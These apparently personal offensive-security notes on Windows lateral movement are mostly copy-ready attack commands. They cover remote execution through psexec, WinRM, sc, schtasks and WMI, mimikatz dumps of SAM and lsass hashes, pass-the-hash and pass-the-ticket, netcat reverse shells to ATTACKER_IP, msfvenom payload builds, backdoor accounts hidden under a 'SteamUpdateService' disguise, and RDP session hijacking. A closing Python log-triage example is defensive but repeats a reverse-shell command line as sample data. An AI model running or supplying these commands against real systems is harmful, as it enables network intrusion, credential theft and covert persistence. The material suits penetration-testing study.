# Lateral Movement

* Finding credentials with more permissions to move through the network cloaked, avoiding detection
* The context of connections from A to B with permission C might be suspicious, therefore some bypass has to be found
* Local and network/domain accounts have to be distinguished. UAC is enforced on local admin accounts and not on domain accounts
* __Service executables need their own special reverse shell__, `msfvenom` file format `exe-service`

## Remote Processes

### psexec

* Port `445`
* `SMB` protocol
* Group membership: `Administrators`
* Upload the service binary to the `ADMIN$` directory of the SMB server
* Use `psexesvc.exe` via the service control manager to execute the remote process
* Communication will be established through a named pipe

```sh
psexec64.exe \\%TARGET_IP% -u Administrator -p %PASSWORD% -i cmd.exe
```

### WinRM

* Ports `5985` (HTTP) and `5986` (HTTPS)
* Group membership: `Remote Management Users`
* Execute PowerShell commands on remote targets

```sh
winrs.exe -u:Administrator -p:%PASSWORD% -r:target cmd
```

* Run through PowerShell alternatively via

```sh
$username = "Administrator";
$password = "SecurePassword";
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
Enter-PSSession -Computername TARGET -Credential $credential
Invoke-Command -Computername TARGET -Credential $credential -ScriptBlock {whoami}
```

### sc

* Ports `135` and `49152-65535` (DCE/RPC); `135` reveals the service endpoints on the high ports
* Ports `139` and `445`: RPC over SMB named pipes, if SVCCTL fails over `135`
* Group membership: `Administrators`
* Create a service remotely via the Service Control Manager (RPC) or `SVCCTL`

```sh
sc.exe \\%TARGET_IP% create MyService binPath= "net user newuser securepassword /add" start= auto
sc.exe \\%TARGET_IP% start MyService
sc.exe \\%TARGET_IP% stop MyService
sc.exe \\%TARGET_IP% delete MyService
```

### schtasks

* Create remote scheduled tasks

```sh
schtasks /s TARGET /RU "SYSTEM" /create /tn "SteamUpdateService" /tr "" /sc ONCE /sd 01/01/1970 /st 00:00
schtasks /s TARGET /run /TN "SteamUpdateService"
```

* Delete scheduled tasks via

```sh
schtasks /S TARGET /TN "SteamUpdateService" /DELETE /F
```

### wmi

* Ports are
  * DCOM: `135` RPC and dynamic ports
  * WSMan: `5985` winrm HTTP and `5986` winrm HTTPS
* Group membership: `Administrators`
* To start, use the same credential object used for winrm

```sh
$username = "Administrator";
$password = "SecurePassword";
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
```

* Store the session

```sh
$Opt = New-CimSessionOption -Protocol DCOM
$Session = New-CimSession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop
```

* __Spawn a remote process__

```sh
$Command = "powershell.exe -Command Set-Content -Path C:\payload.txt -Value itworked";
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = $Command }
```

* Alternatively via

```sh
wmic.exe /user:Administrator /password:securepassword /node:TARGET process call create "cmd.exe /c nc64.exe -e cmd.exe %ATTACKER_IP% %ATTACKER_PORT%"
```

* __Spawn a remote service__

```sh
Invoke-CimMethod -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{
    Name = "SteamUpdateService";
    DisplayName = "SteamUpdateService";
    PathName = "net user gabenewell securepassword /add";
    ServiceType = [byte]::Parse("16");  # Win32OwnProcess: start the service in a new process
    StartMode = "Manual"
}
```

* Initiate the service

```sh
$Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -Filter "Name LIKE 'SteamUpdateService'"
Invoke-CimMethod -InputObject $Service -MethodName StartService
```

* Stop and delete via

```sh
Invoke-CimMethod -InputObject $Service -MethodName StopService
Invoke-CimMethod -InputObject $Service -MethodName Delete
```

* __Spawn a remote scheduled task__

```sh
$Command = "cmd.exe"
$Args = "/c net user gabenewell securepassword /add"
$Action = New-ScheduledTaskAction -CimSession $Session -Execute $Command -Argument $Args
Register-ScheduledTask -CimSession $Session -Action $Action -User "NT AUTHORITY\SYSTEM" -TaskName "SteamUpdateService"
Start-ScheduledTask -CimSession $Session -TaskName "SteamUpdateService"
```

* Delete the task via

```sh
Unregister-ScheduledTask -CimSession $Session -TaskName "SteamUpdateService"
```

* __Install a remote msi package__

```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$TARGET_IP LPORT=4711 -f msi -o steam.msi
```

* Upload and run via

```sh
Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\steam.msi"; Options = ""; AllUsers = $false}
```

* Alternatively on older systems via

```sh
wmic /node:TARGET /user:DOMAIN\USER product call install PackageLocation=c:\Windows\steam.msi
```

## Further Authentication Methods

* NTLM
* Kerberos

### NTLM

#### __Pass the hash__

* Retrieve and pass a hash generated from the password
* Use mimikatz on the local SAM

```sh
privilege::debug
token::elevate
lsadump::sam
```

* Use mimikatz on lsass

```sh
privilege::debug
token::elevate
sekurlsa::msv
```

* Open a reverse shell via mimikatz

```sh
token::revert
sekurlsa::pth /user: /domain: /ntlm: /run:"C:\Windows\temp\nc.exe -e cmd.exe %ATTACKER_IP% 4711"
```

* Via RDP

```sh
xfreerdp /v:$TARGET_IP /u:DOMAIN\\ /pth:
```

* Via psexec

```sh
psexec.py -hashes DOMAIN/@%TARGET_IP%
```

* Via evil-winrm

```sh
evil-winrm -i $TARGET_IP -u -H
```

### Kerberos

* Ticket and session key are needed

#### Pass The Ticket

* Extract via mimikatz

```sh
privilege::debug
sekurlsa::tickets /export
```

* Extracting a TGS needs only a low-privilege account; extracting a TGT needs administrative privileges
* Use the ticket to inject it into the current session

```sh
kerberos::ptt @.kirbi
```

* Check tickets via `klist`

#### Overpass The Hash

* Pass the key: the timestamp used to obtain a TGT is encrypted with the user's secret key
* Algorithms can be `rc4`, `aes128`, `aes256` or `des` if enabled
* The `rc4` key is the plain NTLM hash
* Use the key to obtain the TGT

```sh
privilege::debug
sekurlsa::ekeys
```

* Open a reverse shell via

```sh
sekurlsa::pth /user:Administrator /domain: /: /run:"C:\Windows\Temp\nc.exe -e cmd.exe %ATTACKER_IP% 4711"
```

## Writeable Shares

* Find a shortcut, a script or anything that keeps a connection over the network to a share
* Reuse a `*.vbs` via

```sh
CreateObject("WScript.Shell").Run "cmd.exe /c copy /Y \\%TARGET_IP%\share\nc.exe %tmp% & %tmp%\nc.exe -e cmd.exe %ATTACKER_IP% 4711", 0, True
```

* Reuse and inject into an existing portable executable

```sh
msfvenom -a x64 --platform windows -x -k -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -b "\x00" -f exe -o
```

* Reuse an RDP session: an administrator may have disconnected without closing the session. Reuse it without a password as the administrator user. Therefore run `cmd` or `powershell` as administrator and reuse the session by its name

```sh
PsExec64.exe -s cmd.exe
query user
```

* Check the output and fill in

```sh
tscon /dest:
```

* The session state should be `DISC`, a session which was not exited correctly
* Windows Server < 2019 only without the password
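Detection-side triage for the remote-execution primitives above (psexec's service install, `sc`/`Win32_Service` with a command string as binPath, SYSTEM scheduled tasks, processes spawned under WMI), as an added example that is not part of the original notes: a Python pass over constructed event records modelled on Windows event IDs 7045, 4698 and 4688. The record layout and field names are assumptions, not a real log format.

```python
"""Toy triage of Windows event records for the remote-execution
primitives in the notes (service install, scheduled task, WMI spawn).
Added example; the records below are constructed, not captured."""
import re

# Constructed sample records modelled on System 7045 (service installed),
# Security 4698 (scheduled task created) and 4688 (process created).
EVENTS = [
    {"id": 7045, "host": "WS01", "service": "PSEXESVC",
     "image": r"C:\Windows\PSEXESVC.exe", "account": "LocalSystem"},
    {"id": 7045, "host": "WS01", "service": "MyService",
     "image": "net user newuser securepassword /add", "account": "LocalSystem"},
    {"id": 7045, "host": "WS02", "service": "Spooler",
     "image": r"C:\Windows\System32\spoolsv.exe", "account": "LocalSystem"},
    {"id": 4698, "host": "WS01", "task": r"\SteamUpdateService",
     "task_user": "NT AUTHORITY\\SYSTEM", "creator": "DOMAIN\\alice"},
    {"id": 4688, "host": "WS03",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c nc64.exe -e cmd.exe 10.0.0.5 4444"},
]

# A service image path normally points at an .exe/.sys. A shell command
# string (net, cmd, powershell, nc) as binPath is the sc.exe / Win32_Service
# pattern from the notes, where a non-service binary is handed to the SCM.
CMD_IN_BINPATH = re.compile(r"^(net|cmd|powershell|nc64?)(\.exe)?\b", re.I)


def triage(events):
    """Return (host, reason) pairs for records matching the notes' patterns."""
    findings = []
    for e in events:
        if e["id"] == 7045:
            if e["service"].upper() == "PSEXESVC":
                findings.append((e["host"], "psexec service installed"))
            elif CMD_IN_BINPATH.match(e["image"]):
                findings.append((e["host"], "service binPath is a command, not a binary"))
        elif e["id"] == 4698 and e["task_user"].upper().endswith("SYSTEM"):
            findings.append((e["host"], f"SYSTEM task registered: {e['task']}"))
        elif e["id"] == 4688 and e["parent"].lower().endswith("wmiprvse.exe"):
            findings.append((e["host"], "process spawned by WMI provider host"))
    return findings


if __name__ == "__main__":
    for host, reason in triage(EVENTS):
        print(host, reason)
```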